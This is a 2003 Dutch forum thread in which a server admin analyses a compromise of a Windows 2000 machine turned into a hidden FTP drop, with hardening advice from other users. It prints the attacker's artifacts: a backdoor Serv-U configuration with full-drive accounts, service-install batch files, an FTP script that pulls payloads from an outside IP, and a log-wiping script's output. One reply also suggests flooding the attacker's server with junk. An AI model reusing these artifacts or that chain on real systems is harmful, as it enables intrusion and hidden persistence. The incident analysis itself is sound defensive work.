Om van een windows bak door middel van een exploit een warez porn enz. FTP te maken wordt deze file 99% van de keren gebruikt.

In vogelvlugt:

1 Pak een exploit waar mee je code op de machine uit kan voeren(dus ook ftp.exe aansturen)

2 Gebruikt FTP.exe om je malware exe files, ServU enz. naar de desbetreffende machine te krijgen.

3 De rest kun je wel raden taskscheduler, srvany, remote control enz

[ Voor 18% gewijzigd door TAMW op 04-08-2003 15:32 . Reden: Opmaak ]

maandag 4 augustus 2003 15:24

Acties:

amahusu

taking over the world!

TAMW schreef op 04 August 2003 @ 15:22:
[...]

Om van een windows bak door middel van wat exploit een warez porn enz. FTP te maken wordt deze file 99% van de keren gebruikt.

In vogelvlugt

1 Pak een exploit waar mee je code op de machine uit kan voeren. dus ook ftp.exe aansturen
2 Gebruikt FTP.exe om je malware exe files, ServU enz. naar de desbetreffende machine te krijgen.
3 De rest kun je wel raden taskscheduler, srvany, enz

hehe, eindelijk iemand de het begrijpt

volgens mij denken de meeste mensen hier dat het hacken nog steeds gebeurt zoals je ziet in films zoals "Hackers"

Always Outnumbered, Never Outgunned // Some people feel the rain, others just get wet

maandag 4 augustus 2003 15:38

Acties:

mutsje

Certified Prutser

als je IIS5 of 6.x gewoon in een keer goed installeerd en configureerd valt er weinig te exploiten. Maar als iemand denkt dat ie "beheerder" is en klik klik install doet ja dan vraag je om moeilijkheden.

En dit topic gaat niet over exploiten maar hoe je erachter komt wat er gebeurd is en hoe te voorkomen.

maandag 4 augustus 2003 15:43

Acties:

BasieP

Sluuut schreef op 03 August 2003 @ 17:54:
[...]
Ik heb toch aangegeven dat dit de 4 meest gebruikelijke exploits zijn die worden gebruikt momenteel? Natuurlijk zijn er meerdere mogelijkheden, ga jij ze maar lekker alle miljoen opschrijven.

'sql' Het spijt me dat ik geen perfectionist ben [not], jij gaat toch ook geen File Transfer Protocol schrijven ipv FTP. Iedereen op t.net begrijpt wel wat 'sql' betekend. Zo niet dan vraagt diegene dat maar, maar ga er niet bij mij over zaniken als je zelf allang weet wat het betekend.

jezus anders doe je even niet zo op je teentjes getrapt. ik heb er bij gezet dat het een goede post is, en dat ik alleen even wat toe voeg.
en nee het maakt me geen ruk uit of je ftp of file transfer protocol schrijft maar (lees het maar is over) het gaat me er om dat je zegt van WIE dat ding is
dus of van ms-sql/mysql/ oracle.
bovendien was dat niet tegen jouw, maar tegen te topicstarter. (dit heeft ie inmiddels gedaan)

het was dus absoluut neit nodig om zo'n reply te plaatsen

This message was sent on 100% recyclable electrons.

maandag 4 augustus 2003 15:52

Acties:

maratropa

Ik geloof dat ze vaak spullen dumpen in de "system volume information" directory, waar alleen system recht in heeft en jij dus als admin normaal ook niet in kan.

specs

maandag 4 augustus 2003 15:59

Acties:

TAMW

Ze dumpen het waar het zo min mogelijk opvalt. Zo dumpen ze het ook vaak in de RECYCLER folder.

maandag 4 augustus 2003 16:10

Acties:

Qwerty-273

Meukposter

***** ***

Advies dus is een nieuwe install. en pak een goed boek er bij voor de beveiliging. Alles maar dan ook alles uitschakelen en er af halen wat je niet gebruikt

Gebruik ook geen VNC voor beheer. Gebruik het liefst TS met goede versleutelingen (met 2003 server perfecte webbasedclient

maar ok) en zorg dat alles is afgelsoten. Admin hernoemd. sa account disabled. Guest accounts disabled. enzo meer

Gewoon alles aflopen en afvinken op een lijst. Zodat je zelf nog weet wat er wel en niet op hoort te draaien.

Erzsébet Bathory | Strajk Kobiet | You can lose hope in leaders, but never lose hope in the future.

maandag 4 augustus 2003 16:27

Acties:

HunterPro

zorg echt voor een firewall... ik ben ook met die dcom/rpc exploit aan het testen geweest en er staan zó gruwelijk veel windows dozen open... dat is gewoon eng

zoveel professionaliteit en zó weinig gepatchte bakken op toplocaties als telecity 2...

maandag 4 augustus 2003 17:41

Acties:

Verwijderd

TAMW schreef op 04 August 2003 @ 15:22:
[...]

Om van een windows bak door middel van een exploit een warez porn enz. FTP te maken wordt deze file 99% van de keren gebruikt.

In vogelvlugt:

1 Pak een exploit waar mee je code op de machine uit kan voeren(dus ook ftp.exe aansturen)

2 Gebruikt FTP.exe om je malware exe files, ServU enz. naar de desbetreffende machine te krijgen.

3 De rest kun je wel raden taskscheduler, srvany, remote control enz

ok kan best zijn dat dit in veel scripts zit, maar het wordt ook vaak gebruikt door virusscanners ed om virusupdates op te halen... dat wil ik toch ook graag blijven doen...

maandag 4 augustus 2003 18:19

Acties:

Milo

Even een snelle opmerking: met het admin account hernoemen schiet je niet enorm veel op: de sid blijft hetzelfde (500 geloof ik). Beter is een nieuw admin account aanmaken en de oude disabelen.

Lao Tzu: "As soon as you have made a thought, laugh at it."

maandag 4 augustus 2003 18:49

Acties:

maartena

Ik heb voor het weekend mijn 2 Windows 2000 Servers en mijn 4 Windows 2000 E-Mail Gateways geupdate met deze patch

Alle 6 machines zijn bereikbaar met een "publiek" internet IP adres. Zoals je kunt lezen is deze patch vrij kritiek, en dat heeft mij dan ook doen besluiten VOOR het weekend alles te updaten. Volgens de eigenaar van deze site is het absoluut nodig de patch zo snel mogelijk te installeren. Volgens hem is de code om de bug te gebruiken al bij virusschrijvers en hackers terecht gekomen op bulletin boards etc.

Verder doe je er goed aan om Windows Update automatisch te laten uitvoeren 1 keer per week, en 1 keer per week (een uur na de Windows Update bijvoorbeeld) een automatische reboot in te stellen om de patches te activeren.

"I reject your reality and substitute my own!"
Proud to be an American.
Hier woon ik

maandag 4 augustus 2003 21:46

Acties:

Verwijderd

Goed updaten volgende keer , dan voorkom je zulke dingen.

[ Voor 3% gewijzigd door Verwijderd op 04-08-2003 21:47 ]

dinsdag 5 augustus 2003 08:44

Acties:

mutsje

Certified Prutser

Milo schreef op 04 August 2003 @ 18:19:
Even een snelle opmerking: met het admin account hernoemen schiet je niet enorm veel op: de sid blijft hetzelfde (500 geloof ik). Beter is een nieuw admin account aanmaken en de oude disabelen.

even ter informatie... een buildin administrator account kan niet disabled worden.

dinsdag 5 augustus 2003 09:46

Acties:

Verwijderd

maartena schreef op 04 August 2003 @ 18:49:
Ik heb voor het weekend mijn 2 Windows 2000 Servers en mijn 4 Windows 2000 E-Mail Gateways geupdate met deze patch

Alle 6 machines zijn bereikbaar met een "publiek" internet IP adres. Zoals je kunt lezen is deze patch vrij kritiek, en dat heeft mij dan ook doen besluiten VOOR het weekend alles te updaten. Volgens de eigenaar van deze site is het absoluut nodig de patch zo snel mogelijk te installeren. Volgens hem is de code om de bug te gebruiken al bij virusschrijvers en hackers terecht gekomen op bulletin boards etc.

Verder doe je er goed aan om Windows Update automatisch te laten uitvoeren 1 keer per week, en 1 keer per week (een uur na de Windows Update bijvoorbeeld) een automatische reboot in te stellen om de patches te activeren.

thuis misschien, maar dat ga ik echt niet doen op productie systemen... en ja als je direct aan inet hangt zou ik die patch maar installen... zit je achter een fw dan heb je nog wel even de tijd

dinsdag 5 augustus 2003 09:51

Acties:

HunterPro

Verwijderd schreef op 05 August 2003 @ 09:46:
[...]

thuis misschien, maar dat ga ik echt niet doen op productie systemen... en ja als je direct aan inet hangt zou ik die patch maar installen... zit je achter een fw dan heb je nog wel even de tijd

ligt aan het type productiesystemen... ik beheer een paar servers voor bedrijven die b2b handel in Nederland doen; applicatie-server en zo. om 3 uur 's nachts worden die machines dus ook *echt* niet gebruikt en is 5 minuten of zelfs een half uur downtime eigenlijk geen probleem

dinsdag 5 augustus 2003 12:51

Acties:

Verwijderd

het gaat me niet om de downtime, maar om de connectie naar inet die nodig is voor een update. buiten dat wordt elke update geinstalleerd en vele updates zijn onnodig... bv inet epxlorer 6 sp1 wordt geinstalled terwijl 5.5 sp2 op een server staat... ik zie totaal geen reden om die update te doen...

[ Voor 3% gewijzigd door Verwijderd op 05-08-2003 12:53 ]

dinsdag 5 augustus 2003 13:10

Acties:

Aspje

Blaat

mutsje schreef op 05 August 2003 @ 08:44:
[...]

even ter informatie... een buildin administrator account kan niet disabled worden.

Control panel -> admnistrative tools -> local security settings -> security options.

Het eerste wat je daar ziet is

Accounts: Administrator account status, zet die op disabled en je admin account is disabeled.

dinsdag 5 augustus 2003 23:00

Acties:

Verwijderd

Topicstarter

Ik heb ondertussen de server al weer een tijdje vrolijk draaien, alle tips hier in dit draadje meegenomen. Ik denk als ik nu terug kijk dat het idd de nieuwe exploit is geweest, ik had die update nog niet gedraaid. Ondertussen trouwens de server beveiligd met IPSec, werkt erg mooi. Echte firewall is voor mij helaas geen optie.

Nog even een tip die ik al een tijdje gebruik, en waar ik nog niemand over gehoord heb. Monitor je verkeer (als dit mogelijk is via je provider). Over het algemeen heb je wel een gemiddeld dataverbruik, als er idd een ftp site op komt te staan moet dit zichtbaar zijn (op mijn servers is niet zo heel veel verkeer, dus een ftp-site zou ik direct merken, en vandaar dat ik ook kan zeggen dat de ftp-server bij mij nog niet in gebruik was genomen).

Ik heb trouwens de prioriteit gelegd bij het draaiend krijgen van de server, wellicht dat ik later nog eens uit ga zoeken waarvandaan de hack kwam, ik heb nog een image van m'n systeem).

dinsdag 5 augustus 2003 23:11

Acties:

ReLight

echo("What Now ? !")

My 2 cents:
Denk eraan dat als je wel een (externe) firewall neerzet (een kleintje voor 1 a 2 servers is niet zo duur !) dat deze dus ok kan voorkomen dat er ongewenste sessies van je box naar buiten plaatsvinden, dus niet alleen van Inet naar je Box. Die firewall dien je echt als muur met een eigen beveiliging te beschouwen. Total control.

Mijn zoon & dochter zijn de toekomst, de rest is tijdsvermaak. Home assistant & & Nibe S2125-12/SMO-S40, RMU-s40 & Tado - Volvo C40 ER, SE

woensdag 6 augustus 2003 00:52

Acties:

Verwijderd

Topicstarter

OK, even de tijd genomen om uit te zoeken wat er allemaal aan de hand was, toch best interessant dus ik zal het even plaatsen. Dit wordt wel een heel verhaal, weet niet of dat de bedoeling is maar dat merken we wel weer

In \winnt\system32 kom ik een aantal bestanden tegen (sommige extenties gewijzigd door mij in het proces om 'm de baas te worden):
Afbeeldingslocatie: http://bms3.test.bymysite.nl/hack.gif

Afbeeldingslocatie: http://bms3.test.bymysite.nl/hack.gif

Er is een aantal bestanden interessant:
- JASFV.INI

tempfilepath=.
checkext=.rar
checkext=.r##
checkext=.s##
checkext=.t##
checkext=.###
checkext=.mp3
checkext=.mp2
checkpath=C:\recycler\.tmp\.tmp
createprogress=1 Create only in the directory where the files are uploaded
pointoutnosfv=1
sitename=CraSh
deletebad=0
priority=NORMAL
renameuntested=0

- ServUDeamon.ini (timer.ini lijkt hier op)

[GLOBAL]
TryOut=Full
Version=3.0.0.17
RegistrationKey=[maar even weggehaald]
MaxNrUsers=10
PacketTimeOut=300
LocalSetupPassword=072C63105200180D5C07170A7E3E
LocalSetupPortNo=65111
DirCacheEnable=0
CheckAnonPass=1
AntiHammer=1
AntiHammerBlock=900

[DOMAINS]
Domain1=0.0.0.0||65111|xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|1

[Domain1]
MaxNrUsers=10
User1=admin00|1|0
User2=chilly|1|0
User3=friendly|1|0
LogSystemMes=0
LogSecurityMes=0
LogGETs=0
LogPUTs=0
LogFileSystemMes=0
LogFileSecurityMes=0
LogFileGETs=0
LogFilePUTs=0
SignOn=c:\WINNT\system32\signonlog.txt
DirChangeMesFile=c:\WINNT\system32\dirchangelog.txt
ReplyNoAnon=Bastard! Get your ANONYMOUS ass out of here!
ReplyHello=Str0 Ready For Leech-Mode!
ReplyHelp=Direct Comments of Bugs to idon't@care.com!
ReplyDown=Str0 is going DOWN, try again LATER!
ReplyOffline=Str0 temporarely NOT available!
ReplyTooMany=There Are TOO MANY of You Guys!

[USER=chilly|1]
Password=cz1F70C7188CA463447B49245AEC62B6AB
HomeDir=d:\RECYCLER\S-1-5-21-1085031214-1383384898-839522115-506\temp\tmp
RelPaths=1
AlwaysAllowLogin=1
MaxUsersLoginPerIP=5
Access1=d:\RECYCLER\S-1-5-21-1085031214-1383384898-839522115-506\temp\tmp|RWAMELCDP
[USER=friendly|1]
Password=ju912CEFFF6C89BECD72992869DADA31F5
HomeDir=d:\RECYCLER\S-1-5-21-1085031214-1383384898-839522115-506\temp\tmp
RelPaths=1
MaxUsersLoginPerIP=1
TimeOut=600
Access1=d:\RECYCLER\S-1-5-21-1085031214-1383384898-839522115-506\temp\tmp|RLP
[USER=admin00|1]
Password=kw838F0F56EE8A3EE21DF0EDF64157E356
HomeDir=c:\
AlwaysAllowLogin=1
Maintenance=System
Access1=c:\|RWAMELCDP
Access2=d:\|RWAMELCDP
Access3=e:\|RWAMELCDP
Access4=f:\|RWAMELCDP
Access5=g:\|RWAMELCDP
Access6=h:\|RWAMELCDP
Access7=i:\|RWAMELCDP
Access8=j:\|RWAMELCDP
Access9=k:\|RWAMELCDP
Access10=l:\|RWAMELCDP
Access11=m:\|RWAMELCDP
Access12=n:\|RWAMELCDP
Access13=o:\|RWAMELCDP
Access14=p:\|RWAMELCDP
Access15=q:\|RWAMELCDP
Access16=r:\|RWAMELCDP
Access17=s:\|RWAMELCDP
Access18=t:\|RWAMELCDP
Access19=u:\|RWAMELCDP
Access20=v:\|RWAMELCDP
Access21=w:\|RWAMELCDP
Access22=x:\|RWAMELCDP
Access23=y:\|RWAMELCDP
Access24=z:\|RWAMELCDP

- login.cmd

@echo off
rem
rem Default global login script for the Telnet Server
rem
rem In the default setup, this command script is executed when the
rem initial command shell is invoked. It, in turn, will try to invoke
rem the individual user's login script.
rem
if %USERNAME%==USR_BLN-TS02 goto good
exit
:good
echo *===============================================================
echo Welcome to Microsoft Telnet Server.
echo *===============================================================

- servicem.bat

INSTSRV runndll16 c:\WINNT\system32\winntmngr.exe

- startwinnt.bat

net stop serv-u
c:\WINNT\system32\winntmnnr.exe /i
c:\WINNT\system32\winntmngr.exe /i
net start serv-u

- ftp.txt (interessante!!)

open 194.135.30.201 65166
haxor
haxor
mget *.*
bye
haxor timer.exe
haxor timer.ini
haxor tzolibr.dll

- shares.txt (nr.1 in \winnt)

Attempting stop...

Internet services successfully stopped

Attempting start...

Internet services successfully started

iisreset restarted
Deleting temporary files

The RPC server is unavailable.
The RPC server is unavailable.iisreset restarted
Deleting temporary files

- shares.txt (in system32) (de werkelijke hack)

Removing Remote Services
Service slave sucessfully deleted.
Could not open the service for deletion.
Are you sure r_server exists?

Share name Resource Remark

-------------------------------------------------------------------------------
IPC$ Remote IPC
The command completed successfully.

_______________________________________________
Netbios Login edited succesfully!
Now lets clear the event log
Event log cleaned up
Cleaning logs at c:\
Deleted file - C:\WINNT\COM+.log
C:\WINNT\Debug\ipsecpa.log
C:\WINNT\Debug\oakley.log
C:\WINNT\Debug\PASSWD.LOG
Deleted file - C:\WINNT\Debug\UserMode\userenv.log
C:\WINNT\security\edb.log
Deleted file - C:\WINNT\security\res1.log
Deleted file - C:\WINNT\security\res2.log
C:\WINNT\security\logs\scepol.log
Deleted file - C:\WINNT\security\logs\scesrv.log
Deleted file - C:\WINNT\security\logs\winlogon.log
Deleted file - C:\WINNT\system32\cron.log
C:\WINNT\system32\DTCLog\MSDTC.LOG
Deleted file - C:\WINNT\system32\inetsrv\urlscan\urlscan.073103.log
Deleted file - C:\WINNT\system32\wbem\Logs\wbemcore.log
Deleted file - C:\WINNT\system32\wbem\Logs\WinMgmt.log
C:\WINNT\system32\config\AppEvent.Evt
C:\WINNT\system32\config\SecEvent.Evt
C:\WINNT\system32\config\SysEvent.Evt
Logs cleared

IPC$ was deleted successfully.

Patching webdav
Webdav patched
Stopping Random services
Could not open the service for control commands.
Are you sure RemoteRegistry exists?
Could not open the service for control commands.
Are you sure messenger exists?
Deleting Random services
Could not open the service for deletion.
Are you sure RemoteRegistry exists?
Could not open the service for deletion.
Are you sure messenger exists?
The following services are dependent on the Server service.

Stopping the Server service will also stop these services.

Distributed File System
Computer Browser

The Distributed File System service was stopped successfully.

The Computer Browser service is stopping..
The Computer Browser service was stopped successfully.

The Server service is stopping.
The Server service was stopped successfully.

The Server service is starting.
The Server service was started successfully.

lanmanserver restarted
Temporary Files deleted!
Again removing IPC$!
IPC$ was deleted successfully.

IIS Patched succesfully!
NTPass Patched succesfully!
Netbios Patched succesfully!
Webdav Patched succesfully!
Telnet Patched succesfully!
Patching done!

Shares Still Avaible:
_______________________________________________

There are no entries in the list.

_______________________________________________

- srvinfo.txt

Server Name: CUBALIBRE
Security: Users
NT Type: .
Domain: Error 53
PDC: Error 53
Drive: [FileSys] [ Size ] [ Free ] [ Used ]
C$ NTFS 6001 2842 3159
D$ NTFS 8002 6545 1457
E$ NTFS 3499 2968 531
Services:
[Running] Alerter
[Stopped] Application Management
[Stopped] Background Intelligent Transfer Service
[Running] Computer Browser
[Stopped] Indexing Service
[Stopped] ClipBook
[Running] Cron service
[Running] Distributed File System
[Running] DHCP Client
[Stopped] Logical Disk Manager Administrative Service
[Running] Logical Disk Manager
[Running] DNS Client
[Running] Event Log
[Running] COM+ Event System
[Stopped] Fax Service
[Running] IIS Admin Service
[Stopped] Intersite Messaging
[Stopped] Kerberos Key Distribution Center
[Running] Server
[Running] Workstation
[Running] License Logging Service
[Running] TCP/IP NetBIOS Helper Service
[Stopped] NetMeeting Remote Desktop Sharing
[Running] Distributed Transaction Coordinator
[Running] FTP Publishing Service
[Stopped] Windows Installer
[Running] MySql
[Stopped] Network DDE
[Stopped] Network DDE DSDM
[Stopped] Net Logon
[Running] Network Connections
[Stopped] File Replication
[Stopped] NT LM Security Support Provider
[Running] Removable Storage
[Running] Plug and Play
[Running] IPSEC Policy Agent
[Running] Protected Storage
[Stopped] Remote Access Auto Connection Manager
[Running] Remote Access Connection Manager
[Stopped] Routing and Remote Access
[Stopped] Remote Procedure Call (RPC) Locator
[Stopped] Remote Procedure Call (RPC)
[Stopped] QoS RSVP
[Running] Security Accounts Manager
[Stopped] Smart Card Helper
[Stopped] Smart Card
[Running] Task Scheduler
[Running] RunAs Service
[Running] System Event Notification
[Stopped] Internet Connection Sharing
[Running] Simple Mail Transport Protocol (SMTP)
[Running] Print Spooler
[Running] stunnel
[Running] SuperMicro Health Assistant
[Stopped] Performance Logs and Alerts
[Running] Telephony
[Running] Terminal Services
[Stopped] Windows Timer Service
[Stopped] Telnet
[Stopped] Distributed Link Tracking Server
[Running] Distributed Link Tracking Client
[Stopped] Uninterruptible Power Supply
[Stopped] Utility Manager
[Stopped] Windows Time
[Stopped] World Wide Web Publishing Service
[Running] Windows Management Instrumentation
[Running] VNC Server
[Running] Windows Management Instrumentation Driver Extensions
[Stopped] Automatic Updates
[Stopped] Wireless Configuration
[Running] Serv-U FTP Server

- system.sys

+-----------------------------------------------------+
+ Speed.Force
+-----------------------------------------------------+
+ Hacked By: CraSh
+ Scanned By: CraSh
+-----------------------------------------------------+
+ Users Connected(now): %UNow
+ Server Uptime: %ServerDays Days, %ServerHours Hours
+
+ Logins Since Server Started %loggedInAll total
+
+ Total Kb downloaded: %Bdown Kb
+ Total Kb uploaded: %BUp Kb
+ Ammout of Files downloaded: %FDown
+ Ammout of Files uploaded: %FUp
+
+ Average Speed: %ServerAvg KB/sec
+ Current Speed: %ServerKBps Kb/sec
+ Free Disk Space: %DFree MB
+
+ Your IP: %IP
+-----------------------------------------------------+

Waar ik wel van geschrokken ben is dat ik een versie van timer.exe, tzolibr.dll en srvinfo.exe op m'n server had staan met daarbij de modified datum van resp. 24-6-2003 13:52, 24-6-2003 13:53 en 24-6-2003 19:44. Ik dacht even dat ik dus al op 24-6 gehacked zou zijn, maar dit komt denk ik door de acties in ftp.txt.

Al met al heb ik de hack dus direct gemerkt en hebben ze er geen gebruik van kunnen maken. Enige wat ik me nu afvraag is welke exploit ze gebruikt hebben, het is iig een of andere buffer overflow waardoor ze code hebben kunnen runnen waarmee ze via ftp bestanden op m'n server hebben gezet.

edit:
spelfoutjes

woensdag 6 augustus 2003 01:28

Acties:

Verwijderd

hmz, heb niet alles gelezen, maar de enige die mij de laatste tijd opvalt is deze soort

code:

1
2
3

WebDAV 
Exploit available at www.XXXXXXXXX.net 
193.XXX.XXX.XXX

in combinatie met de text:

code:

1	Enable Microsoft-IIS/5.0

ff een en ander uitgesterd

Bij microsoft staat WebDav bekend als Webfolders, ik geloof ook dat het huidige SharePoint hierop gebaseerd is.

[ Voor 33% gewijzigd door Verwijderd op 06-08-2003 01:34 ]

woensdag 6 augustus 2003 09:45

Acties:

VisionMaster

Security!

grappige ftp pagina van die dude genaamd CraSh
Dit is een aardig rappe server die hij (mis)bruikt.
Ik heb zelf ook een aardige verbinding en ik kom niet vaak tegen dat ik bijna met mijn maximum kan up/downloaden met een FTP site. Deze server is ook gehacked volgens mij en hij misbruikt het om hier zijn hack-progsels vanaf te downloaden. Hij hoeft alleen maar een scriptje uit te kunnen laten voeren op je systeem en je machine hoort bij zijn prive community als ftp server voor vanalles en nog wat.

Ik vind het grappig om deze dude te pesten en misschien is het zijn prive server . Eens kijken wat er gebeurt als ik deze machine vol gooi met rotzooi files. Ik zit zelf achter een grote router die als direct als core-firewall dient voor verschillende subnetten en daarbij dus verschillende porten onbereikbaar maakt en zelf zit ik op een redelijk dichtgetimmerde Linux doos.

offtopic:
Misschien dat ik eens gehacked wordt hier op mijn werk, dan heeft de CT afdeling weer eens wat te doen. Al hoop ik het niet ... krijg ik vast gedonder LOL

I've visited the Mothership @ Cupertino

woensdag 6 augustus 2003 16:48

Acties:

Verwijderd

Maak een backup van je gehackte systeem drive. Het kan vol staan met evidence! IP adressen in de logs, namen en paswoorden die de hacker gebruikt (voorkeur voor heeft), tools die hij gebruikt.. noem maar op. Het is bewijs materiaal. Bewaren dus!

Daarnaast.. ja, opnieuw installeren is meestal sneller dan cleanen. Zeker als het steeds weer terug komt. Maar belangrijker is te achterhalen WIE en WAAROM.

Succes ermee!

woensdag 6 augustus 2003 17:01

Acties:

Ankh

|true

wat ik wel grappig vind. ik zie veel dingen voorbij komen, maar volgens mij niet het gene wat er echt gebeurt is (iig lijkt mij zo.. ) tis wat warm hiero dus kan het fout hebben

Hij staat niet in het lijstje, maar is zeer kwaadaardig, want je kan alles doen.
win2k heeft een nasty habbit (oid) om rdc aan te zetten, of een ander programma wat er gedraait daarvoor. Daarbij door connectie fouten (kan je neit beveiligen, behalve firewall) kan men naar je admin passwords gaan gokken (bepaalde poort, weet niet welke). Wanneer ze deze weten is kinderspel. Even een programma genaamd Dameware starten en inloggen op je bak.. En voila je hebt totale controle over zijn / haar pc. je hebt van system eigenschappen tot remote desktop connectie tot dos. Oftewel logs verwijderen gaat met een hand om draai. rdc is leuk, (vooral de gene is ingelogd

, behalve bij spellen ^_^) maar probeer hier dus dan ook wat aan te doen (firewall op de poorten zetten of iets degelijks, en natuurlijk je zelf een moeilijk password aan leren

)

tis trouwens geen netbios.. imho

-Ankh- Camera Gear: Nikon D7000 | Nikon AF-S DX 16-85mm f3.5-5.6 AF-S DX VR & Tokina AT-X 116 Pro DX AF 11-16mm f2,8

woensdag 6 augustus 2003 17:40

Acties:

Verwijderd

194.135.30.201

russische server... hoe onverwacht...

woensdag 6 augustus 2003 18:18

Acties:

TAMW

inetnum: 194.135.30.0 - 194.135.30.255
netname: RELCOM
descr: "RELCOM.BUSINESS NETWORK" Ltd.
descr: Russia
country: RU
admin-c: AP6123-RIPE
tech-c: AP6123-RIPE
status: ASSIGNED PA
mnt-by: AS2118-MNT
changed: ip-dbm@ripn.net 20000221
changed: ip-dbm@ripn.net 20020506
source: RIPE

route: 194.135.30.0/24
descr: RELCOM HOSTING
origin: AS2118
notify: noc@relcom.eu.net
mnt-by: AS2118-MNT
changed: olegs@relcom.eu.net 20001025
source: RIPE

person: Alexander Philippov
address: "RELCOM.BUSINESS NETWORK" Ltd.
address: Kurchatov sq. 1
address: Moscow
phone: +7 095 1967515
e-mail: advt@relcom.ru
nic-hdl: AP6123-RIPE
notify: ip-reg@ripn.net
changed: slava@relcom.ru 20000218
source: RIPE

woensdag 6 augustus 2003 19:16

Acties:

Ankh

|true

Verwijderd schreef op 06 August 2003 @ 17:40:
[...]

russische server... hoe onverwacht...

ja en maakt dat veel uit? denk zomaar dat dat ook een gehackte server is

-Ankh- Camera Gear: Nikon D7000 | Nikon AF-S DX 16-85mm f3.5-5.6 AF-S DX VR & Tokina AT-X 116 Pro DX AF 11-16mm f2,8

donderdag 7 augustus 2003 11:16

Acties:

amahusu

taking over the world!

ik zou btw niet allemaal naar die "hack" server connecten, want wie weet worden jullie ip's dan ook gelogged en dan ben je ook de lul als de sysadmins erachter komen

Always Outnumbered, Never Outgunned // Some people feel the rain, others just get wet

donderdag 7 augustus 2003 11:56

Acties:

Verwijderd

Ik heb thuis het boek hacking exposed. Hier staat een hoofdstuk in met alle kwetsbaarheden van 2000 server en hoe je jezelf daar tegen kan beschermen. Misschien is het handig om dat boek of een ander boek over dat onderwerp aan te schaffen zodat je na je reinstall die tips kan toepassen

donderdag 7 augustus 2003 14:45

Acties:

VisionMaster

Security!

amahusu schreef op 07 August 2003 @ 11:16:
ik zou btw niet allemaal naar die "hack" server connecten, want wie weet worden jullie ip's dan ook gelogged en dan ben je ook de lul als de sysadmins erachter komen

Maar ... dat is precies hoe het 'probleem' werkt.
Er wordt een script uitgevoerd bij het slachtoffer die een ftp connectie maakt naar die server en download een paar progseltjes. HEt script actieveerd die dingen en hoppa je hoort bij de 'community of hacked systems'.

Dus er zullen vast en zeker meerdere mensen al ongezien hebben geconnect met die ftp. Zal je zelf dan nog opvallen als iemand die niet met het script binnen valt?

ja en maakt dat veel uit? denk zomaar dat dat ook een gehackte server is

Ik zou niet anders verwachten. Als het zijn eigen ftp server is dan is de script-kiddie nog stommer dan de term doet vermoeden.

[ Voor 20% gewijzigd door VisionMaster op 07-08-2003 14:47 ]

I've visited the Mothership @ Cupertino

zondag 7 september 2003 10:57

Acties:

Verwijderd

Sluuut schreef op 01 August 2003 @ 10:40:
Hoe kom je erachter wie de hacker is?
Bekijk je netwerk logs. Windows Server logt alle gegevens van mensen die op je PC zijn geweest/getracht in te breken. Zo kun je het IP van de hacker achterhalen,
en een Abuse mailtje sturen naar de ISP.

Het gebeurd toch nooit via hun eigen computer, en om via die root nog de echte dader te achterhalen lijkt me niet te lukken.

zondag 7 september 2003 20:09

Acties:

InSPiRE

Verwijderd schreef op 07 September 2003 @ 10:57:
[...]

Het gebeurd toch nooit via hun eigen computer, en om via die root nog de echte dader te achterhalen lijkt me niet te lukken.

Dat lijkt mij ook, ik zou mij zo voor kunnen stellen dat als je een servertje gaat hacken dat je toch min over 1 anonymous proxy te werk gaat. En dan ben je als hacker never nooit niet te achterhalen.

maandag 8 september 2003 21:28

Acties:

Gunner

Invincibles

Ik heb het administrator account maar ge-disabled via dit knowledgebase artikel:

How to Deny Access to the Local Administrator on Windows 2000

In Windows 2000, you cannot disable built-in accounts. However, you can deny access to the local Administrator account by modifying the local security settings.

NOTE: Before you follow these steps, make sure that there is at least one other local or network user who can gain access to the computer with administrator permissions.
Log on as Administrator, or as a user with administrator permissions.
Clicking Start, point to Programs, point to Administrative Tools, and then click Local Security Policy.
In the left pane, expand the Local Policies node, and then click User Rights Assignment.
In the right pane, double-click Deny access to this computer from the network.
In Local Security Policy Setting, click Add.
In the Users and Groups box, click the Administrator account, and then click Add.
Click OK, click OK, and then quit the Local Security Settings console. You must restart your computer for the new security setting to take effect.

Still warm the blood that courses through my veins. | PvOutput | ARSENAL FC

woensdag 26 november 2003 09:54

Acties:

Verwijderd

ben dezelfde hack laatst ook tegen gekomen bij een toen nog niet klant van ons.
Was gedaan OP dezelfde wijze alleen op een Nt4 bak. en de hacker noemde zich Iso-Monster. en alle namen van de bestandjes waren anders, als ik een beetje goed gegoogeld heb is het idd, gewoon een script kiddie.

Je komt de Files enz. behoorlijk vaak tegen bij dit soort hacks alleemaal zelfde principe alleen andere namen.

Zoals ze al gezegd hebben is idd reïnstall slim maar ook bijvoorbeeld een image maken en aangiften doen. ( als hij gepakt word kan je schade verhalen )